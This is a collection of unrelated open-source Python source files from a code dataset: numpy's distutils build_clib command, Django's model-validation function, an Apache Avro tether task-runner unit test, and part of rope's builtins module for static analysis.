ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
@requires: Python 2.3 or higher
@newfield contributor: Contributors:
@contributor: U{Reka Albert <http://www.phys.psu.edu/~ralbert/>}
'''
__version__ = '0.7.0'
class GraphError(ValueError):
pass
| gpl-3.0 |
rhythmsosad/numpy | numpy/distutils/command/build_clib.py | 152 | 12217 | """ Modified version of build_clib that handles fortran source files.
"""
from __future__ import division, absolute_import, print_function
import os
from glob import glob
import shutil
from distutils.command.build_clib import build_clib as old_build_clib
from distutils.errors import DistutilsSetupError, DistutilsError, \
DistutilsFileError
from numpy.distutils import log
from distutils.dep_util import newer_group
from numpy.distutils.misc_util import filter_sources, has_f_sources,\
has_cxx_sources, all_strings, get_lib_source_files, is_sequence, \
get_numpy_include_dirs
# Fix Python distutils bug sf #1718574:
_l = old_build_clib.user_options
for _i in range(len(_l)):
if _l[_i][0] in ['build-clib', 'build-temp']:
_l[_i] = (_l[_i][0]+'=',)+_l[_i][1:]
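# distutils treats an option name ending in '=' as one that takes an
# argument, so the loop above rewrites 'build-clib' and 'build-temp'
# into 'build-clib=' and 'build-temp=' to restore that behavior.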
#
class build_clib(old_build_clib):
description = "build C/C++/F libraries used by Python extensions"
user_options = old_build_clib.user_options + [
('fcompiler=', None,
"specify the Fortran compiler type"),
('inplace', 'i', 'Build in-place'),
('parallel=', 'j',
"number of parallel jobs"),
]
boolean_options = old_build_clib.boolean_options + ['inplace']
def initialize_options(self):
old_build_clib.initialize_options(self)
self.fcompiler = None
self.inplace = 0
self.parallel = None
def finalize_options(self):
if self.parallel:
try:
self.parallel = int(self.parallel)
except ValueError:
raise ValueError("--parallel/-j argument must be an integer")
old_build_clib.finalize_options(self)
self.set_undefined_options('build', ('parallel', 'parallel'))
def have_f_sources(self):
for (lib_name, build_info) in self.libraries:
if has_f_sources(build_info.get('sources', [])):
return True
return False
def have_cxx_sources(self):
for (lib_name, build_info) in self.libraries:
if has_cxx_sources(build_info.get('sources', [])):
return True
return False
def run(self):
if not self.libraries:
return
# Make sure that library sources are complete.
languages = []
# Make sure that extension sources are complete.
self.run_command('build_src')
for (lib_name, build_info) in self.libraries:
l = build_info.get('language', None)
if l and l not in languages: languages.append(l)
from distutils.ccompiler import new_compiler
self.compiler = new_compiler(compiler=self.compiler,
dry_run=self.dry_run,
force=self.force)
self.compiler.customize(self.distribution,
need_cxx=self.have_cxx_sources())
libraries = self.libraries
self.libraries = None
self.compiler.customize_cmd(self)
self.libraries = libraries
self.compiler.show_customization()
if self.have_f_sources():
from numpy.distutils.fcompiler import new_fcompiler
self._f_compiler = new_fcompiler(compiler=self.fcompiler,
verbose=self.verbose,
dry_run=self.dry_run,
force=self.force,
requiref90='f90' in languages,
c_compiler=self.compiler)
if self._f_compiler is not None:
self._f_compiler.customize(self.distribution)
libraries = self.libraries
self.libraries = None
self._f_compiler.customize_cmd(self)
self.libraries = libraries
self._f_compiler.show_customization()
else:
self._f_compiler = None
self.build_libraries(self.libraries)
if self.inplace:
for l in self.distribution.installed_libraries:
libname = self.compiler.library_filename(l.name)
source = os.path.join(self.build_clib, libname)
target = os.path.join(l.target_dir, libname)
self.mkpath(l.target_dir)
shutil.copy(source, target)
def get_source_files(self):
self.check_library_list(self.libraries)
filenames = []
for lib in self.libraries:
filenames.extend(get_lib_source_files(lib))
return filenames
def build_libraries(self, libraries):
for (lib_name, build_info) in libraries:
self.build_a_library(build_info, lib_name, libraries)
def build_a_library(self, build_info, lib_name, libraries):
# default compilers
compiler = self.compiler
fcompiler = self._f_compiler
sources = build_info.get('sources')
if sources is None or not is_sequence(sources):
raise DistutilsSetupError(("in 'libraries' option (library '%s'), " +
"'sources' must be present and must be " +
"a list of source filenames") % lib_name)
sources = list(sources)
c_sources, cxx_sources, f_sources, fmodule_sources \
= filter_sources(sources)
# f90 support is required if there are any f90 module sources or if the
# library language is explicitly 'f90'.
requiref90 = bool(fmodule_sources) or \
build_info.get('language', 'c') == 'f90'
# save source type information so that build_ext can use it.
source_languages = []
if c_sources: source_languages.append('c')
if cxx_sources: source_languages.append('c++')
if requiref90: source_languages.append('f90')
elif f_sources: source_languages.append('f77')
build_info['source_languages'] = source_languages
lib_file = compiler.library_filename(lib_name,
output_dir=self.build_clib)
depends = sources + build_info.get('depends', [])
if not (self.force or newer_group(depends, lib_file, 'newer')):
log.debug("skipping '%s' library (up-to-date)", lib_name)
return
else:
log.info("building '%s' library", lib_name)
config_fc = build_info.get('config_fc', {})
if fcompiler is not None and config_fc:
log.info('using additional config_fc from setup script '\
'for fortran compiler: %s' \
% (config_fc,))
from numpy.distutils.fcompiler import new_fcompiler
fcompiler = new_fcompiler(compiler=fcompiler.compiler_type,
verbose=self.verbose,
dry_run=self.dry_run,
force=self.force,
requiref90=requiref90,
c_compiler=self.compiler)
if fcompiler is not None:
dist = self.distribution
base_config_fc = dist.get_option_dict('config_fc').copy()
base_config_fc.update(config_fc)
fcompiler.customize(base_config_fc)
# check availability of Fortran compilers
if (f_sources or fmodule_sources) and fcompiler is None:
raise DistutilsError("library %s has Fortran sources"\
" but no Fortran compiler found" % (lib_name))
if fcompiler is not None:
fcompiler.extra_f77_compile_args = build_info.get('extra_f77_compile_args') or []
fcompiler.extra_f90_compile_args = build_info.get('extra_f90_compile_args') or []
macros = build_info.get('macros')
include_dirs = build_info.get('include_dirs')
if include_dirs is None:
include_dirs = []
extra_postargs = build_info.get('extra_compiler_args') or []
include_dirs.extend(get_numpy_include_dirs())
# where compiled F90 module files are:
module_dirs = build_info.get('module_dirs') or []
module_build_dir = os.path.dirname(lib_file)
if requiref90: self.mkpath(module_build_dir)
if compiler.compiler_type=='msvc':
# this hack works around the msvc compiler attributes
# problem, msvc uses its own convention :(
c_sources += cxx_sources
cxx_sources = []
objects = []
if c_sources:
log.info("compiling C sources")
objects = compiler.compile(c_sources,
output_dir=self.build_temp,
macros=macros,
include_dirs=include_dirs,
debug=self.debug,
extra_postargs=extra_postargs)
if cxx_sources:
log.info("compiling C++ sources")
cxx_compiler = compiler.cxx_compiler()
cxx_objects = cxx_compiler.compile(cxx_sources,
output_dir=self.build_temp,
macros=macros,
include_dirs=include_dirs,
debug=self.debug,
extra_postargs=extra_postargs)
objects.extend(cxx_objects)
if f_sources or fmodule_sources:
extra_postargs = []
f_objects = []
if requiref90:
if fcompiler.module_dir_switch is None:
existing_modules = glob('*.mod')
extra_postargs += fcompiler.module_options(\
module_dirs, module_build_dir)
if fmodule_sources:
log.info("compiling Fortran 90 module sources")
f_objects += fcompiler.compile(fmodule_sources,
output_dir=self.build_temp,
macros=macros,
include_dirs=include_dirs,
debug=self.debug,
extra_postargs=extra_postargs)
if requiref90 and fcompiler.module_dir_switch is None:
# move new compiled F90 module files to module_build_dir
for f in glob('*.mod'):
if f in existing_modules:
continue
t = os.path.join(module_build_dir, f)
if os.path.abspath(f)==os.path.abspath(t):
continue
if os.path.isfile(t):
os.remove(t)
try:
self.move_file(f, module_build_dir)
except DistutilsFileError:
log.warn('failed to move %r to %r' \
% (f, module_build_dir))
if f_sources:
log.info("compiling Fortran sources")
f_objects += fcompiler.compile(f_sources,
output_dir=self.build_temp,
macros=macros,
include_dirs=include_dirs,
debug=self.debug,
extra_postargs=extra_postargs)
else:
f_objects = []
objects.extend(f_objects)
# assume that default linker is suitable for
# linking Fortran object files
compiler.create_static_lib(objects, lib_name,
output_dir=self.build_clib,
debug=self.debug)
# fix library dependencies
clib_libraries = build_info.get('libraries', [])
for lname, binfo in libraries:
if lname in clib_libraries:
clib_libraries.extend(binfo.get('libraries', []))
if clib_libraries:
build_info['libraries'] = clib_libraries
| bsd-3-clause |
joshblum/django-with-audit | django/core/management/validation.py | 79 | 19846 | import sys
from django.core.management.color import color_style
from django.utils.itercompat import is_iterable
class ModelErrorCollection:
def __init__(self, outfile=sys.stdout):
self.errors = []
self.outfile = outfile
self.style = color_style()
def add(self, context, error):
self.errors.append((context, error))
self.outfile.write(self.style.ERROR("%s: %s\n" % (context, error)))
def get_validation_errors(outfile, app=None):
"""
Validates all models that are part of the specified app. If no app name is provided,
validates all models of all installed apps. Writes errors, if any, to outfile.
Returns number of errors.
"""
from django.conf import settings
from django.db import models, connection
from django.db.models.loading import get_app_errors
from django.db.models.fields.related import RelatedObject
from django.db.models.deletion import SET_NULL, SET_DEFAULT
e = ModelErrorCollection(outfile)
for (app_name, error) in get_app_errors().items():
e.add(app_name, error)
for cls in models.get_models(app):
opts = cls._meta
# Do field-specific validation.
for f in opts.local_fields:
if f.name == 'id' and not f.primary_key and opts.pk.name == 'id':
e.add(opts, '"%s": You can\'t use "id" as a field name, because each model automatically gets an "id" field if none of the fields have primary_key=True. You need to either remove/rename your "id" field or add primary_key=True to a field.' % f.name)
if f.name.endswith('_'):
e.add(opts, '"%s": Field names cannot end with underscores, because this would lead to ambiguous queryset filters.' % f.name)
if (f.primary_key and f.null and
not connection.features.interprets_empty_strings_as_nulls):
# We cannot reliably check this for backends like Oracle which
# consider NULL and '' to be equal (and thus set up
# character-based fields a little differently).
e.add(opts, '"%s": Primary key fields cannot have null=True.' % f.name)
if isinstance(f, models.CharField):
try:
max_length = int(f.max_length)
if max_length <= 0:
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
except (ValueError, TypeError):
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
if isinstance(f, models.DecimalField):
decimalp_ok, mdigits_ok = False, False
decimalp_msg = '"%s": DecimalFields require a "decimal_places" attribute that is a non-negative integer.'
try:
decimal_places = int(f.decimal_places)
if decimal_places < 0:
e.add(opts, decimalp_msg % f.name)
else:
decimalp_ok = True
except (ValueError, TypeError):
e.add(opts, decimalp_msg % f.name)
mdigits_msg = '"%s": DecimalFields require a "max_digits" attribute that is a positive integer.'
try:
max_digits = int(f.max_digits)
if max_digits <= 0:
e.add(opts, mdigits_msg % f.name)
else:
mdigits_ok = True
except (ValueError, TypeError):
e.add(opts, mdigits_msg % f.name)
invalid_values_msg = '"%s": DecimalFields require a "max_digits" attribute value that is greater than or equal to the value of the "decimal_places" attribute.'
if decimalp_ok and mdigits_ok:
if decimal_places > max_digits:
e.add(opts, invalid_values_msg % f.name)
if isinstance(f, models.FileField) and not f.upload_to:
e.add(opts, '"%s": FileFields require an "upload_to" attribute.' % f.name)
if isinstance(f, models.ImageField):
# Try to import PIL in either of the two ways it can end up installed.
try:
from PIL import Image
except ImportError:
try:
import Image
except ImportError:
e.add(opts, '"%s": To use ImageFields, you need to install the Python Imaging Library. Get it at http://www.pythonware.com/products/pil/ .' % f.name)
if isinstance(f, models.BooleanField) and getattr(f, 'null', False):
e.add(opts, '"%s": BooleanFields do not accept null values. Use a NullBooleanField instead.' % f.name)
if f.choices:
if isinstance(f.choices, basestring) or not is_iterable(f.choices):
e.add(opts, '"%s": "choices" should be iterable (e.g., a tuple or list).' % f.name)
else:
for c in f.choices:
if not isinstance(c, (list, tuple)) or len(c) != 2:
e.add(opts, '"%s": "choices" should be a sequence of two-tuples.' % f.name)
if f.db_index not in (None, True, False):
e.add(opts, '"%s": "db_index" should be either None, True or False.' % f.name)
# Perform any backend-specific field validation.
connection.validation.validate_field(e, opts, f)
# Check if the on_delete behavior is sane
if f.rel and hasattr(f.rel, 'on_delete'):
if f.rel.on_delete == SET_NULL and not f.null:
e.add(opts, "'%s' specifies on_delete=SET_NULL, but cannot be null." % f.name)
elif f.rel.on_delete == SET_DEFAULT and not f.has_default():
e.add(opts, "'%s' specifies on_delete=SET_DEFAULT, but has no default value." % f.name)
# Check to see if the related field will clash with any existing
# fields, m2m fields, m2m related objects or related objects
if f.rel:
if f.rel.to not in models.get_models():
e.add(opts, "'%s' has a relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, (str, unicode)):
continue
# Make sure the related field specified by a ForeignKey is unique
if not f.rel.to._meta.get_field(f.rel.field_name).unique:
e.add(opts, "Field '%s' under model '%s' must have a unique=True constraint." % (f.rel.field_name, f.rel.to.__name__))
rel_opts = f.rel.to._meta
rel_name = RelatedObject(f.rel.to, cls, f).get_accessor_name()
rel_query_name = f.related_query_name()
if not f.rel.is_hidden():
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
seen_intermediary_signatures = []
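# Each signature is a (related model, this model, through model) triple;
# seeing the same triple twice means two manually-defined m2m relations
# share an intermediary model, which is rejected below.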
for i, f in enumerate(opts.local_many_to_many):
# Check to see if the related m2m field will clash with any
# existing fields, m2m fields, m2m related objects or related
# objects
if f.rel.to not in models.get_models():
e.add(opts, "'%s' has an m2m relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, (str, unicode)):
continue
# Check that the field is not set to unique. ManyToManyFields do not support unique.
if f.unique:
e.add(opts, "ManyToManyFields cannot be unique. Remove the unique argument on '%s'." % f.name)
if f.rel.through is not None and not isinstance(f.rel.through, basestring):
from_model, to_model = cls, f.rel.to
if from_model == to_model and f.rel.symmetrical and not f.rel.through._meta.auto_created:
e.add(opts, "Many-to-many fields with intermediate tables cannot be symmetrical.")
seen_from, seen_to, seen_self = False, False, 0
for inter_field in f.rel.through._meta.fields:
rel_to = getattr(inter_field.rel, 'to', None)
if from_model == to_model: # relation to self
if rel_to == from_model:
seen_self += 1
if seen_self > 2:
e.add(opts, "Intermediary model %s has more than "
"two foreign keys to %s, which is ambiguous "
"and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
if rel_to == from_model:
if seen_from:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
seen_from = True
elif rel_to == to_model:
if seen_to:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
rel_to._meta.object_name
)
)
else:
seen_to = True
if f.rel.through not in models.get_models(include_auto_created=True):
e.add(opts, "'%s' specifies an m2m relation through model "
"%s, which has not been installed." % (f.name, f.rel.through)
)
signature = (f.rel.to, cls, f.rel.through)
if signature in seen_intermediary_signatures:
e.add(opts, "The model %s has two manually-defined m2m "
"relations through the model %s, which is not "
"permitted. Please consider using an extra field on "
"your intermediary model instead." % (
cls._meta.object_name,
f.rel.through._meta.object_name
)
)
else:
seen_intermediary_signatures.append(signature)
if not f.rel.through._meta.auto_created:
seen_related_fk, seen_this_fk = False, False
for field in f.rel.through._meta.fields:
if field.rel:
if not seen_related_fk and field.rel.to == f.rel.to:
seen_related_fk = True
elif field.rel.to == cls:
seen_this_fk = True
if not seen_related_fk or not seen_this_fk:
e.add(opts, "'%s' is a manually-defined m2m relation "
"through model %s, which does not have foreign keys "
"to %s and %s" % (f.name, f.rel.through._meta.object_name,
f.rel.to._meta.object_name, cls._meta.object_name)
)
elif isinstance(f.rel.through, basestring):
e.add(opts, "'%s' specifies an m2m relation through model %s, "
"which has not been installed" % (f.name, f.rel.through)
)
rel_opts = f.rel.to._meta
rel_name = RelatedObject(f.rel.to, cls, f).get_accessor_name()
rel_query_name = f.related_query_name()
# If rel_name is none, there is no reverse accessor (this only
# occurs for symmetrical m2m relations to self). If this is the
# case, there are no clashes to check for this field, as there are
# no reverse descriptors for this field.
if rel_name is not None:
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
# Check ordering attribute.
if opts.ordering:
for field_name in opts.ordering:
if field_name == '?': continue
if field_name.startswith('-'):
field_name = field_name[1:]
if opts.order_with_respect_to and field_name == '_order':
continue
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
if '__' in field_name:
continue
# Skip ordering on pk. This is always a valid order_by field
# but is an alias and therefore won't be found by opts.get_field.
if field_name == 'pk':
continue
try:
opts.get_field(field_name, many_to_many=False)
except models.FieldDoesNotExist:
e.add(opts, '"ordering" refers to "%s", a field that doesn\'t exist.' % field_name)
# Check unique_together.
for ut in opts.unique_together:
for field_name in ut:
try:
f = opts.get_field(field_name, many_to_many=True)
except models.FieldDoesNotExist:
e.add(opts, '"unique_together" refers to %s, a field that doesn\'t exist. Check your syntax.' % field_name)
else:
if isinstance(f.rel, models.ManyToManyRel):
e.add(opts, '"unique_together" refers to %s. ManyToManyFields are not supported in unique_together.' % f.name)
if f not in opts.local_fields:
e.add(opts, '"unique_together" refers to %s. This is not in the same model as the unique_together statement.' % f.name)
return len(e.errors)
| bsd-3-clause |
apache/avro | lang/py/avro/test/test_tether_task_runner.py | 2 | 6739 | #!/usr/bin/env python3
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import logging
import os
import subprocess
import sys
import time
import unittest
import avro.io
import avro.test.mock_tether_parent
import avro.test.word_count_task
import avro.tether.tether_task
import avro.tether.tether_task_runner
import avro.tether.util
class TestTetherTaskRunner(unittest.TestCase):
"""unit test for a tethered task runner."""
def test1(self):
# set the logging level to debug so that debug messages are printed
logging.basicConfig(level=logging.DEBUG)
proc = None
try:
# launch the server in a separate process
parent_port = avro.tether.util.find_port()
pyfile = avro.test.mock_tether_parent.__file__
proc = subprocess.Popen([sys.executable, pyfile, "start_server", f"{parent_port}"])
input_port = avro.tether.util.find_port()
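# NOTE: input_port is allocated here but is not used later in this test.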
print(f"Mock server started process pid={proc.pid}")
# Possible race condition? open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
runner = avro.tether.tether_task_runner.TaskRunner(avro.test.word_count_task.WordCountTask())
runner.start(outputport=parent_port, join=False)
# Test sending various messages to the server and ensuring they are processed correctly
requestor = avro.tether.tether_task.HTTPRequestor(
"localhost",
runner.server.server_address[1],
avro.tether.tether_task.inputProtocol,
)
# TODO: We should validate that open worked by grabbing the STDOUT of the subprocess
# and ensuring that it outputted the correct message.
# Test the mapper
requestor.request(
"configure",
{
"taskType": avro.tether.tether_task.TaskType.MAP,
"inSchema": str(runner.task.inschema),
"outSchema": str(runner.task.midschema),
},
)
# Serialize some data so we can send it to the input function
datum = "This is a line of text"
writer = io.BytesIO()
encoder = avro.io.BinaryEncoder(writer)
datum_writer = avro.io.DatumWriter(runner.task.inschema)
datum_writer.write(datum, encoder)
writer.seek(0)
data = writer.read()
# Call input to simulate calling map
requestor.request("input", {"data": data, "count": 1})
# Test the reducer
requestor.request(
"configure",
{
"taskType": avro.tether.tether_task.TaskType.REDUCE,
"inSchema": str(runner.task.midschema),
"outSchema": str(runner.task.outschema),
},
)
# Serialize some data so we can send it to the input function
datum = {"key": "word", "value": 2}
writer = io.BytesIO()
encoder = avro.io.BinaryEncoder(writer)
datum_writer = avro.io.DatumWriter(runner.task.midschema)
datum_writer.write(datum, encoder)
writer.seek(0)
data = writer.read()
# Call input to simulate calling reduce
requestor.request("input", {"data": data, "count": 1})
requestor.request("complete", {})
runner.task.ready_for_shutdown.wait()
runner.server.shutdown()
# time.sleep(2)
# runner.server.shutdown()
sthread = runner.sthread
# Possible race condition?
time.sleep(1)
# make sure the other thread terminated
self.assertFalse(sthread.is_alive())
# shutdown the logging
logging.shutdown()
finally:
# close the process
if not (proc is None):
proc.kill()
def test2(self):
"""
In this test we want to make sure that when we run "tether_task_runner.py"
as our main script, everything works as expected. We do this by using subprocess to run it
in a separate process.
"""
proc = None
runnerproc = None
try:
# launch the server in a separate process
parent_port = avro.tether.util.find_port()
pyfile = avro.test.mock_tether_parent.__file__
proc = subprocess.Popen([sys.executable, pyfile, "start_server", f"{parent_port}"])
# Possible race condition? When we start tether_task_runner it will call
# open, which tries to connect to the subprocess before the subprocess is
# fully started, so we give the subprocess time to start up
time.sleep(1)
# start the tether_task_runner in a separate process
runnerproc = subprocess.Popen(
[
sys.executable,
avro.tether.tether_task_runner.__file__,
"avro.test.word_count_task.WordCountTask",
],
env={"AVRO_TETHER_OUTPUT_PORT": f"{parent_port}", "PYTHONPATH": ":".join(sys.path)},
)
# possible race condition wait for the process to start
time.sleep(1)
print(f"Mock server started process pid={proc.pid}")
# Possible race condition? open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
finally:
# close the process
if not (runnerproc is None):
runnerproc.kill()
if not (proc is None):
proc.kill()
if __name__ == ("__main__"): # pragma: no coverage
unittest.main()
| apache-2.0 |
muff1nman/Vim | vim/eclim/autoload/eclim/python/rope/base/builtins.py | 9 | 23636 | """This module trys to support builtin types and functions."""
import inspect
import rope.base.evaluate
from rope.base import pynames, pyobjects, arguments, utils
class BuiltinModule(pyobjects.AbstractModule):
def __init__(self, name, pycore=None, initial={}):
super(BuiltinModule, self).__init__()
self.name = name
self.pycore = pycore
self.initial = initial
parent = None
def get_attributes(self):
return self.attributes
def get_doc(self):
if self.module:
return self.module.__doc__
def get_name(self):
return self.name.split('.')[-1]
@property
@utils.saveit
def attributes(self):
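# Merges the real module's attributes with the 'initial' seeds and any
# builtin submodules known to pycore; utils.saveit caches the result.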
result = _object_attributes(self.module, self)
result.update(self.initial)
if self.pycore is not None:
submodules = self.pycore._builtin_submodules(self.name)
for name, module in submodules.iteritems():
result[name] = rope.base.builtins.BuiltinName(module)
return result
@property
@utils.saveit
def module(self):
try:
result = __import__(self.name)
for token in self.name.split('.')[1:]:
result = getattr(result, token, None)
return result
except ImportError:
return
class _BuiltinElement(object):
def __init__(self, builtin, parent=None):
self.builtin = builtin
self._parent = parent
def get_doc(self):
if self.builtin:
return getattr(self.builtin, '__doc__', None)
def get_name(self):
if self.builtin:
return getattr(self.builtin, '__name__', None)
@property
def parent(self):
if self._parent is None:
return builtins
return self._parent
class BuiltinClass(_BuiltinElement, pyobjects.AbstractClass):
def __init__(self, builtin, attributes, parent=None):
_BuiltinElement.__init__(self, builtin, parent)
pyobjects.AbstractClass.__init__(self)
self.initial = attributes
@utils.saveit
def get_attributes(self):
result = _object_attributes(self.builtin, self)
result.update(self.initial)
return result
class BuiltinFunction(_BuiltinElement, pyobjects.AbstractFunction):
def __init__(self, returned=None, function=None, builtin=None,
argnames=[], parent=None):
_BuiltinElement.__init__(self, builtin, parent)
pyobjects.AbstractFunction.__init__(self)
self.argnames = argnames
self.returned = returned
self.function = function
def get_returned_object(self, args):
if self.function is not None:
return self.function(_CallContext(self.argnames, args))
else:
return self.returned
def get_param_names(self, special_args=True):
return self.argnames
class BuiltinUnknown(_BuiltinElement, pyobjects.PyObject):
def __init__(self, builtin):
super(BuiltinUnknown, self).__init__(pyobjects.get_unknown())
self.builtin = builtin
self.type = pyobjects.get_unknown()
@utils.saveit
def get_attributes(self):
return _object_attributes(self.builtin, self)
def _object_attributes(obj, parent):
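# Wrap each attribute of the real builtin object in the matching Builtin*
# pyobject (class, routine, or unknown) so rope can reason about it statically.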
attributes = {}
for name in dir(obj):
if name == 'None':
continue
child = getattr(obj, name)
pyobject = None
if inspect.isclass(child):
pyobject = BuiltinClass(child, {}, parent=parent)
elif inspect.isroutine(child):
pyobject = BuiltinFunction(builtin=child, parent=parent)
else:
pyobject = BuiltinUnknown(builtin=child)
attributes[name] = BuiltinName(pyobject)
return attributes
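# The two factories below memoize their results: for a given set of
# constructor arguments, the same builtin wrapper instance is reused.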
def _create_builtin_type_getter(cls):
def _get_builtin(*args):
if not hasattr(cls, '_generated'):
cls._generated = {}
if args not in cls._generated:
cls._generated[args] = cls(*args)
return cls._generated[args]
return _get_builtin
def _create_builtin_getter(cls):
type_getter = _create_builtin_type_getter(cls)
def _get_builtin(*args):
return pyobjects.PyObject(type_getter(*args))
return _get_builtin
class _CallContext(object):
def __init__(self, argnames, args):
self.argnames = argnames
self.args = args
def _get_scope_and_pyname(self, pyname):
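# Find the scope that defines `pyname` and the name it is bound to, by
# scanning the scope at the definition line and its enclosing scopes.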
if pyname is not None and isinstance(pyname, pynames.AssignedName):
pymodule, lineno = pyname.get_definition_location()
if pymodule is None:
return None, None
if lineno is None:
lineno = 1
scope = pymodule.get_scope().get_inner_scope_for_line(lineno)
name = None
while name is None and scope is not None:
for current in scope.get_names():
if scope[current] is pyname:
name = current
break
else:
scope = scope.parent
return scope, name
return None, None
def get_argument(self, name):
if self.args:
args = self.args.get_arguments(self.argnames)
return args[self.argnames.index(name)]
def get_pyname(self, name):
if self.args:
args = self.args.get_pynames(self.argnames)
if name in self.argnames:
return args[self.argnames.index(name)]
def get_arguments(self, argnames):
if self.args:
return self.args.get_arguments(argnames)
def get_pynames(self, argnames):
if self.args:
return self.args.get_pynames(argnames)
def get_per_name(self):
if self.args is None:
return None
pyname = self.args.get_instance_pyname()
scope, name = self._get_scope_and_pyname(pyname)
if name is not None:
pymodule = pyname.get_definition_location()[0]
return pymodule.pycore.object_info.get_per_name(scope, name)
return None
def save_per_name(self, value):
if self.args is None:
return None
pyname = self.args.get_instance_pyname()
scope, name = self._get_scope_and_pyname(pyname)
if name is not None:
pymodule = pyname.get_definition_location()[0]
pymodule.pycore.object_info.save_per_name(scope, name, value)
class _AttributeCollector(object):
def __init__(self, type):
self.attributes = {}
self.type = type
def __call__(self, name, returned=None, function=None,
argnames=['self'], check_existence=True):
try:
builtin = getattr(self.type, name)
except AttributeError:
if check_existence:
raise
builtin = None
self.attributes[name] = BuiltinName(
BuiltinFunction(returned=returned, function=function,
argnames=argnames, builtin=builtin))
def __setitem__(self, name, value):
self.attributes[name] = value
class List(BuiltinClass):
def __init__(self, holding=None):
self.holding = holding
collector = _AttributeCollector(list)
collector('__iter__', function=self._iterator_get)
collector('__new__', function=self._new_list)
# Adding methods
collector('append', function=self._list_add, argnames=['self', 'value'])
collector('__setitem__', function=self._list_add,
argnames=['self', 'index', 'value'])
collector('insert', function=self._list_add,
argnames=['self', 'index', 'value'])
collector('extend', function=self._self_set,
argnames=['self', 'iterable'])
# Getting methods
collector('__getitem__', function=self._list_get)
collector('pop', function=self._list_get)
collector('__getslice__', function=self._self_get)
